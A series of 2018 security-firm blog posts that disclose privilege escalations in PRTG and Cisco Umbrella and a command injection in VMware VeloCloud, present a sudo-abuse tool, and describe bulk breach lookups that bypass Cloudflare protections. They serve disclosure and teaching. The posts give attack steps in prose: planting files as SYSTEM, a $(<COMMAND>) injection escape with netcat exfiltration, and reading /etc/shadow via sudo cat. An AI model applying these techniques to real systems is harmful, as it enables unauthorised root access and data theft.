PRTG Network Monitor Privilege Escalation

Background:
Recently I’ve seen a decent number of privilege escalations occurring on Windows due to permission issues and using symlinks. The work from Ryan Hanson from Atredis on the Cylance privilege escalation and Windows Standard Collector privilege escalation really inspired me to research more into this issue and potentially find some myself.

After several weeks of researching the usage of symlinks, hardlinks, and junctions on Windows (mostly provided by James Forshaw at Google’s Project Zero), I felt as if I had a basic understanding of the attack vector used. So, the next question was where do I start looking for my own privilege escalation using symlinks?

The answer to that was rather simple. While reviewing some past findings from another researcher, Codewatch, I came across this PRTG Network Monitor tool and was surprised that the web application was running processes as SYSTEM. So the logical next step was to download the tool and see what I could break!

Versions Tested:
18.2.41.1652

CVE Numbers:
CVE-2018-17887

Security Advisories:
None

Issue:
Upon downloading the software, the first thing I did (since my goal was to find issues where symlinks could be leveraged) was to monitor the services running using Procmon.exe. To my surprise, I found several instances where I could use symlinks to gain system-level privileges! What luck, right?

The issue stems from a service named “PRTG Probe Service.” One of the actions taken by this service is to write logs under the notorious C:ProgramData directory.

Side note: it appears that the ProgramData directory gets a lot of vendors in trouble so extra attention should be placed on permissions in that location.

In total, there are four directories written to by the “PRTG Probe Service” as SYSTEM; one of those shown below in Figure 1.

Figure 1: Vulnerable Log Files

The other directories are:
• C:ProgramDataPaesslerPRTG Network MonitorLogs (Debug)
• C:ProgramDataPaesslerPRTG Network MonitorLogs (Sensors)
• C:ProgramDataPaesslerPRTG Network MonitorLogs (System)
• C:ProgramDataPaesslerPRTG Network MonitorLogs (Web Server)

The issue isn’t actually the symlink, it is the access rights assigned to those files, as seen in Figure 2. For some odd reason, PRTG designed the application to create these log files with absolutely zero permissions assigned!

Figure 2: Permissions for log files

Because no rights are assigned to those log files, a low-level (non-privileged) user can do the following, which is explained in greater detail in the “Proof of Concept” section:

  • Delete all files in “C:ProgramDataPaesslerPRTG Network MonitorLogs*” directories.
  • Create a symlink using any of the log files and redirecting them to a new directory. Using RPC we can rename the file along the way (this is done as SYSTEM since the service will be creating the file).

The steps above allowed me to redirect one log file to the “C:Program Files (x86)PRTG Network MonitorNotificationsEXE” directory and rename it to exploit.bat. The batch script created a new user and added that user to the Administrators group.
One thing to note: I didn’t need to create the exploit.bat file to gain escalated privileges. I could have created a DLL where one was missing and conduct DLL hijacking or binary planting. I did it this way as I was interested in seeing how the notifications job worked.
The below proof of concept shows one way of exploiting this issue along with a video showing a different log file being leveraged for exploitation.

Proof of Concept:
The first step in the attack is to remove all files from the “C:ProgramDataPaesslerPRTG Network MonitorLogs*” directory as a low-level user. In Figure 3 example below, I used the “C:ProgramDataPaesslerPRTG Network MonitorLogs (System)” directory.

Figure 3: Deleting files from the target directory

We then created a symlink from our target directory to a new location as well as using an RPC call to rename the file. In Figure 4 we use the file “PRTG Probe Log (1).log” and moved it to “C:Program Files (x86)PRTG Network MonitorNotificationsEXEexploit.bat”. This allows files within that directory to be executed from the web application through notifications with SYSTEM privileges. We could have moved this file to a location where the program looked for a DLL which did not exist and performed DLL hijacking.

Figure 4: Showing user rights and creation of symlink

After the symlink was created, we restarted the service. We restarted the service as admin just for ease of testing, however, in the directory “C:ProgramDataPaesslerPRTG Network MonitorLogs (Web Server)” we can create a symlink with that log file and then browse to the web page. The program then attempted to write to the web server log file which is our symlink, as seen in Figure 5.

Figure 5: Showing the usage of Web Server log instead of restarting service

In Figure 6, we show that the file exploit.bat did not exist prior to exploitation and that files within that directory are not editable by low-level users.

Figure 6: Contents of EXE directory and rights of files within

After restarting the service we see that the symlink is followed by the service, and the file exploit.bat is created and the rights for that file make it so any user on the system can edit it, as seen in Figure 7.

Figure 7: Proof exploit.bat was created and the rights for that file

As a low level-user, we added malicious code to exploit.bat (as seen in Figure 8) that upon execution, adds a local administrator account.

Figure 8: Code within exploit.bat

Figure 9 shows the accounts that exist on the victim machine prior to exploitation.

Figure 9: Accounts that exist prior to exploit

Finally, due to my curiosity, we created a notification in the Web-GUI (as seen in Figure 10) and used the “execute notification” feature to force the execution of the exploit.bat program.

Figure 10: Creation of the notification job

Upon execution, we can see in Figure 11 that our wonderful user “pwn” was created and added as a local administrator!

Figure 11: Pwnage!

We have also added a script to exploit this issue on our GitHub page.

Other Info:
Concerned about the successful privilege escalation, I disclosed the issue in July to the vendor, Paessler, but unfortunately, they did not consider it a security issue (see Figure 12) and to my knowledge, have not informed their clients of the risk. I have validated that a patch was created for this issue and released. However, I am not sure when that patch was released. I am now releasing this information in the public interest, so end-users can take preventative actions.

Figure 12: Email from PRTG

Timeline:
2018-07-08 – Vendor Disclosure.
2018-07-09 – Vendor Responded Claiming No Security Issue.
2018-07-09 – Responded back to the vendor with further details and public info on why it is an issue. Vendor didn’t respond.
2018-07-13 – Emailed vendor to check status. Vendor didn’t respond.
2018-09-20 – Confirmed vendor fixed the security issue. Vendor still hasn’t responded.
2018-10-03 – Public Release.

Discovered by Quentin (Paragonsec) Rhoads-Herrera | TEAMARES
October 3, 2018

Cisco Umbrella Enterprise Roaming Client and Enterprise Roaming Module Privilege Escalation Vulnerability

CVE Numbers:
CVE-2018-0437 – Cisco Umbrella ERC releases prior to 2.1.118 and Cisco Umbrella
CVE-2018-0438 – Cisco Umbrella ERC releases prior to 2.1.127

Versions Tested:
Umbrella Roaming Client 2.0.168

Security Advisories:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-priv
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-file-read

Binary Planting:
The Umbrella Roaming Client from Cisco OpenDNS includes a service named Umbrella_RC which is executed as SYSTEM on startup. This service consumes several files within the C:ProgramDataOpenDNS* directory which possesses the user rights shown in Figure 1.

Figure 1: User Rights

According to Microsoft, local users have the ability to write data to the above-referenced directory which, by default, isn’t a security vulnerability. However, what happens if the service requests files that don’t exist within this directory?

Like DLL Hijacking, Binary Planting is a vulnerability in which a malicious user places a binary file containing exploit code in a location where an application or service will execute it. This is exactly what happened in this example.

The service looks for two Windows binaries in a non-standard path, as seen in Figures 2 and 3, prior to finding them in the Windows System directory allowing us to perform a “Binary Planting” exploitation:

  • C:ProgramDataOpenDNSERCcmd.exe
  • C:ProgramDataOpenDNSERCnetsh.exe
Figure 2: CMD.exe Lookup by ERCService.exe
Figure 3: NETSH.exe Lookup by ERCService.exe

For our example, we are going to generate two executables that would add a user, add that user to the administrator’s group, and then write a file to C:. As shown in Figure 4 we are using a low-level user to perform these actions.

Figure 4: Local Low-Level User

Proof-of-Concept (POC) CODE:

With the above POC code, we compile it using Visual Studio as seen in Figure 5. In this example, I compiled two different binaries that would add user “pwnage1” and “pwnage2”.

Figure 5: Compiling exploit code

Now with the exploit code compiled we need to move it over to the directory C:ProgramDataOpenDNSERC as seen in Figure 6:

Figure 6: Moving our binaries

Now we can either restart our machine or be lazy and restart the service as an admin user;  either way will yield the same result which is an admin user, and a file is written in C: as seen in Figures 7-9:

Figure 7: User from malicious netsh.exe binary

Figure 8: User from malicious cmd.exe binary

Figure 9: Files written in C: from malicious netsh.exe and cmd.exe binaries

MSI Planting:

Following the same trend as the above Binary Planting issue, the OpenDNS application also looks for an MSI for upgrading purposes as seen in Figure 10. However, just like above, this MSI is being searched for in a directory that a local low-level user has write access to, as seen in Figure 11.

Figure 10: MSI Lookup

Figure 11: User writes

In order to exploit this, we are going to use a trial version of the software “Advanced Installer” in order to create an MSI containing malicious code. Within the MSI we are going to create two scheduled tasks that will do the following, as seen in Figure 12:

  • Create a local user
  • Add that user to the administrator’s group

Figure 12: MSI Containing the scheduled tasks

After generating the MSI, we move it to the directory it is being searched from as seen in Figure 13.

Figure 13: Moving MSI as a low-level user

As earlier, we can either restart the machine or restart the service as admin to prove our point. Either way, the service will find and execute the MSI, write a log file showing the MSI was executed, and delete it.

Once executed the scheduled tasks within the MSI will be created as seen in Figure 14.

Figure 14: Scheduled tasks created

Once these tasks are executed the user, “pwn” (or whatever cool name you give it), will be created and added into the administrator’s group, as seen in Figure 15.

Figure 15: User pwn created

Log file from MSI execution by ERCService.exe:

Timeline:

2018-05-12 – Vendor Disclosure

2018-05-16 – Vendor Confirmed Vulnerabilities

2018-09-05 – Public Release

Credit:

Discovered by Quentin (Paragonsec) Rhoads-Herrera | TEAMARES
September 5, 2018

Defending Layer 8

Security awareness training is broken. Read the news any day of the week and you can find articles talking about breaches, ransomware attacks, and countless records stolen resulting in identity theft victims. Our users are continuing to click suspicious links, open attachments they weren’t expecting, and falling for the call to action. Attackers know that our users are the weakest link in the security chain.

In 2014, Gartner calculated the market space for security awareness training at $1 billion dollars with a double-digit annual growth percentage. Gartner is predicting the market space will be $10 billion sometime between 2024 and 2027. With the rapid increase in security awareness training spend, why are we continuing to see so many breaches? What are we missing ineffective security awareness programs?

1. Executive Buy-in

I recently presented on security awareness at a local trade show and found about 30% of organizations had some type of executive buy-in for their security awareness program. For as many companies that claim to say cybersecurity is a priority, why such a low percentage of support from the C-suite?

Get your executives to promote the security awareness program and encourage all employees to participate. Without the official nod of approval, we find ourselves with limited traction in the organization.

2.  Meaningful Metrics

Metrics and Key Performance Indicators are one of the missing or poorly setup components of a security awareness program. Metrics for security awareness usually come packaged such as:

  • How many people took the training?
  • How quickly did people complete the training?
  • How many people passed/failed the quiz at the end of the training module?

When you were in grade school, you didn’t get a grade on your assignment based on the number of questions completed or if you turned in the piece of paper. You were graded based on the number of questions answered correctly! Your grade was based on the output of your learning, not the input. Too many times to we see security awareness programs set up to measure the inputs and not the resultant output behavior. So, what’s an example of an output metric?

  • Number of reporting phishing messages
  • Increase/decrease in the number of security incidents
  • Decrease in security incidents by poorly performing individuals/departments after completing training
  • Incident avoidance rate

With the incident avoidance metric, take the estimated cost for downtime and convert it to an hourly rate. The hourly rate should be multiplied by the average number of hours of downtime for an individual or department during a cybersecurity incident. Track the number of cybersecurity incidents your organization responds to on a monthly and annual basis. Once the incident avoidance rate exceeds your annual spend on security awareness training, you’ve just offset the cost of your training program! This is an excellent way of quantifying the effectiveness of your security awareness program.

Step 1: Create metrics

Step 2: ???

Step 3: Profit!

3.  Active Learning

Make it fun. Make it engaging. Make it memorable. The worst type of training is a boring PowerPoint with narration. Edgar Dale, an American educator who developed the Cone of Experience, tells us that only 10-30% of what we see and hear, also known as passive learning, is actually remembered. 70-90% of your security awareness spend is wasted with passive learning techniques!

When we engage active learning techniques, like using quizzes during training, phishing simulations, tabletop exercises, or having employees present about their security awareness experiences during a company lunch and learn, the percentage of recall jumps to 70-90%! An amazing increase in effectiveness with just a small change.

4.  Distributed Practice

A 1978 study, “The Influence of Length and Frequency of Training Sessions on the Rate of Learning to Type”, showed that postal workers were able to learn how to more effectively use a new typewriter system faster when the practice was spaced instead of when a longer instruction session was given. We can exploit this method of learning by giving shorter periods of security awareness training spread throughout the year. In today’s age of constant interruptions from push notifications, emails, phone calls, and your boss stopping by the cubicle to see how things are going, it’s hard to dedicate an extended period of time to anything. Breaking training into 15-30 minute easily understandable topics is a quick win to get training completed.

With distributed practice, we also need to space our phishing simulations. Setup a schedule with intervals randomized from every 3 to 7 weeks. With a predictable schedule, users are on the lookout for a phishing campaign. Using the same template, or a limited group of templates, results in the prairie dog effect. Once a single user spots the phishing test, they notify their friends and coworkers what to be on the lookout for skewing metrics for the test.

5.  Don’t Focus on Just the Phish

While phishing is the most prominent and publicized means of attacking the user, other avenues are gaining in popularity and effectiveness. USB Drops, Voice phishing (Vishing), SMS Phishing (SMShing), and physically accessing a location are additional ways for an attacker to load malware, get a user to give up their password, or find one written on a sticky note under the keyboard (or taped to the side of the monitor). Physical security is often left out of the curriculum, and goes untested by security groups, as our penetration testers have strolled through hallways unchallenged.

Ensure user awareness programs educate them on the dangers of devices founds on the ground and enable them to challenge unknown callers asking for sensitive information or unfamiliar employees without a badge or escort. Many user awareness products include pieces for testing a user’s susceptibility to dropped USB sticks, but never underestimate the insight gained by calling the helpdesk or having a friend try to walk in and grab a seat at an unoccupied desk. (See #3 — This is the best active learning technique!)

In closing, setup meaningful metrics tracking the output of the security awareness program. Implement changes and track their effectiveness. Engage your users with more meaningful content and active learning techniques and watch the increase in the effectiveness of your security awareness program.

by Brendan Dalpe | Senior Security Consultant
August 15, 2018

Unauthenticated Command Injection Vulnerability in VMware NSX SD-WAN by VeloCloud

Exploits for network devices including routers, switches, and firewalls have been around for as long as networking has been a thing. It seems like every week a researcher discloses a new vulnerability or publishes proof of concept (PoC) code online for these types of devices, and that is exactly what is happening in this article. Today, we walk through the discovery of an unauthenticated command injection vulnerability discovered by myself and the TEAMARES penetration testing team during a recent engagement.

We began our reconnaissance by probing external IPs and we quickly stumbled upon an NSX SD-WAN by VeloCloud that was quite interesting. The device required no authentication to access the web UI and disclosed sensitive information such as internal IP addresses. Diving further into the device we found that it has a nice diagnostics functionality that allows users to troubleshoot network connectivity and retrieve other metrics directly from the device. Naturally, the team decided to test the device to see if it could be exploited as an initial entry point to pivot into the organization’s internal network from the WAN.

After identifying a potential pivot point, we start by researching the device to see if any vulnerabilities have been announced by the vendor or if anyone has published an exploit/PoC code online. The device being targeted was updated to the latest version (3.1.1), which patched the existing vulnerabilities announced by VMware. No PoC code or exploits existed for version 3.1.1 yet, so we set out to find a new vulnerability in the device and create an exploit that would allow us to breach our target.

Redirecting our attention back to the previously mentioned diagnostic functions, we first targeted the Traceroute tool, since the input field would accept either an IP address or a hostname, with the thought that since the field would accept both, it might be easier to break out of due to less strict sanitization of user input.

Figure 1 – Screenshot of the Traceroute Diagnostic Function

The team’s assumption here was that the user input would be passed to the underlying operating system as a command to perform a traceroute. Since many network appliances run on some sort of embedded Linux, we worked towards breaking this command using Linux-friendly escapes to inject malicious commands. Once the proper escape characters were identified $(<COMMAND>) the HTTP request was loaded into Burp Suite’s Repeater. Success.

Figure 2 – HTTP Request in Burp Suite Containing PoC Exploit

In the screenshot above you can see that the code is being injected just after the IP address. The code executes the Linux command “id” (which prints out information as the current user) and returns the output of the command to a server under our control via a netcat connection. On the receiving end, a netcat listener was opened prior to submitting the POST Request to catch the output.

Figure 3 – Output of ‘id’ Command Returned to a netcat Listener

From this output, we learned that commands were being executed as the user “root”. Perfect. This code is just a quick PoC to show that it was vulnerable and exploitable. Since these commands are running as root, the possibilities are endless, and a malicious actor would have complete control of the device at this point.

But Why Did This Work?

After investigating the code running on the device itself, we discovered that the utilities and scripts were written in the Lua language. Lua is a powerful language, useful for experienced programmers, but it is considered easy for less experienced programmers at the same time. While researching vulnerabilities and exploits for systems running things written in Lua we found a write-up on seclists.org with great examples that thoroughly explained the vulnerabilities and how to exploit them, including vulnerable code samples (Link: http://seclists.org/fulldisclosure/2014/May/128 ).

From the seclists write up:

“OS COMMAND INJECTION

OS command injection flaws (CWE-78) allow attackers to run arbitrary commands on the remote server. Because a command injection vulnerability may lead to compromise of the server hosting the web application, it is often considered a very serious flaw. In Lua, this kind of vulnerability occurs, for example, when a developer uses unvalidated user data to run operating system commands via the os.execute() or io.popen() Lua functions.”

In the example code following the description above, a reader can clearly see where the injection point exists at the os.execute Lua function.

Vulnerable code examples:

Reporting and Patching

VMware has released a patch to address this vulnerability. Remediation actions required for affected devices including updating to version 3.1.2. Details can be found in the VMware Security Advisory VMSA-2018-011.1.

CyberOne’s TEAMARES penetration testing team followed responsible disclosure procedure by submitting the vulnerability to VMware’s Security Response Center, and waiting for a patch to be released for the affected devices before publishing any information. The vulnerability was also disclosed independently to VMware by security researcher Brian Sullivan from Tevora.

Fall of Sudo – A Pwnage Collection

Introduction

Finding Linux servers heavily reliant on Sudo rules for daily management tasks is a common occurrence. While not necessarily bad, Sudo rules can quickly become security’s worst nightmare. Before discussing the security implications, let’s first discuss what Sudo is.

Defining Sudo

What is Sudo? Sudo, which stands for “superuser do!,” is a program that allows a user’s execution of commands as other users, most commonly as root, the “administrator” equivalent for Linux operating systems; think “runas” for Windows. Sudo enables the implementation of the least privilege model, in which users are only given rights to run certain elevated commands based on what’s necessary to complete their job. Without Sudo, we would need to log into the server or desktop as root to perform an update, change network settings, remove users, or perform any other privileged task. Nothing bad could come from that right?

A Brief Education of Sudo

This post isn’t about how Sudo is a bad program, but instead Sudo’s common misconfiguration. Some Linux shops use LDAP for the centralization of Sudo rules for a machine, but, commonly the file /etc/sudoers is the standard method of management. This file may look intimidating, but for the sake of this post, we are only going to talk about how users are assigned rules.

#
# This file MUST be edited with the ‘visudo’ command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
Defaults mail_badpass
Defaults secure_path=”/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin”
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL:ALL) ALL
paragonsec ALL=(ALL:ALL) /bin/cat
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# See sudoers(5) for more information on “#include” directives:
#includedir /etc/sudoers.d

/etc/sudoers file example

The lines highlighted in the above example are what will be discussed in this post. This controls which users can run Sudo and what program they can run. Multiple entries can exist per user to facilitate running different programs under different user contexts depending on requirements. The format of a basic user Sudo rule is the following:<user>   <host>=(<user run as>:<group run as>) <command>

In the above /etc/sudoers file we see the user “Paragonsec” has the rule “ALL(ALL:ALL) /bin/cat”. This grants the user “Paragonesc” the ability to execute /bin/cat with Sudo on any host, as any user, as any group. While this might not seem like a terrible thing we can use /bin/cat’s functionality to print out any file on the system as root. Maybe something /etc/shadow.

The Problem with Sudo

With basic knowledge of Sudo and /etc/sudoers the hunt for vulnerabilities is on. During engagements, I consistently see 2 scenarios as it relates to Sudo rules.

  1. A complete lack of configuration where the Sudo rules don’t follow the least privilege model and allow for many users to execute commands as root.
  2. A relatively secure set of Sudo rules, but the command assigned is a rarely used argument that allows the execution of shell commands.

Either way, Sudo has the potential to provide many opportunities to elevate your privileges in Linux, and often abusing Sudo rules is the quickest way to gain root privileges.

One might quickly point a finger at the Linux administrators for this oversight, but they aren’t the only culprits. Time and time again I come across routers, switches, cloud servers, and more that come with weak Sudo rules. The usual argument for this is “the user is an admin and should have the ability to execute commands as root.” If that’s the case, let’s just say “Root for everyone!”

This isn’t a reasonable option, so we need a way to secure Sudo. The best way to secure anything is to know how it can be abused by testing it, and for this, we now have Fall of Sudo.

Fall of Sudo

During an engagement leveraging these rules I thought, “how could I keep a record of all the insane wizardry Sudo privilege escalations I have seen people use?” The solution: “Fall of Sudo”; a script compiling a collection of Sudo rule privilege escalations I have either by looking at man pages or picked up from Linux gurus.
The purpose of this tool is to teach red teamers and blue teamers various ways to leverage Sudo rules on commands ranging from bash to rsync to gain root!

Currently, two features exist:

  • information feature – This queries your current users’ Sudo rules and displays rules that could be leveraged to gain root. Upon selection, the rule will be presented with an l33t printout showing which commands to execute in order to exploit the rule.

Output showing how /bin/cat can be abused to get the contents of /etc/shadow

  • “autopwn” feature – This was created for one reason… to anger a certain Linux Wizard I know! If you know what you are doing, and have READ THE SCRIPT, then, by all means, make your life easier and just autopwn those Sudo rules.

Showing the ALL/ALL being abused to get root

It is important to note that I have not added extended rule support (e.g. /bin/sed s/test/woot/g notarealfile). I highly suggest you use the information functionality, so you can adjust the pwnage to your needs, and always test the rules in a controlled environment.

Is this it? Absolutely not! I plan on taking others’ input and expertise to add more Sudo rules as they become available. Version two is currently being planned, and thus far I have the following as possible additions:

  • Added module support
  • Addition of a learning function that shows and explains the exact issue with the Sudo rule
  • Support for expanded rules
  • Support for Sudo environment variables
  • Creation of a VM that would allow hands-on pwnage of varying Sudo rules

How You Can Help

I envision this growing even further to help both red teamers, blue teamers, and Linux admins. I recognize that I am not the leading expert on Linux by any means, and this is where the community comes in. If you care to help grow this project, please open an issue on GitHub and share your ideas!

by Quentin Rhoads-Herrera | Offensive Security Manager
May 21, 2018

Finding Enterprise Credentials in Data Breaches

In the age of the breach, it’s a safe assumption that almost every public account’s credentials have been exposed at some point. “Have I Been Pwned” (HIBP), is a database that contains usernames and other information about any compromise they come across.  While available for individuals to search against, certain protections have been put in place to prevent DDoS attacks, making mass scanning using their public API difficult.

As a red teamer, this information is very valuable during the passive reconnaissance phase of an engagement, and querying a single email at a time doesn’t scale well against an organization of 10,000 users. While many applications and scripts have been written and shared using the API’s, there wasn’t one available that successfully scans through an entire list of emails.

HIBP leverages CloudFlare as a web application firewall (WAF) that enforces brute-force protection through the use of 2 user-agent-based cookies and rate-limiting. To circumvent these controls, the script first reaches out to CloudFlare leveraging a pre-set user agent and obtains the authentication cookies using an opensource project known as cloudflare-scrape (cfscrape).  The script then utilizes the obtained cookies and a built-in 2-second time delay between queries to conform to the rate-limit.

The script can identify whether a specific email address has been breached according to HIPB, obtain any paste information if present, search or obtain a list of breaches, and download a copy of all breaches contained within HIBP.

Example of searching emails for potential breaches and obtaining pastes if they exist within HIBP database

by Quentin Rhoads-Herrera | Offensive Security Manager
May 1, 2018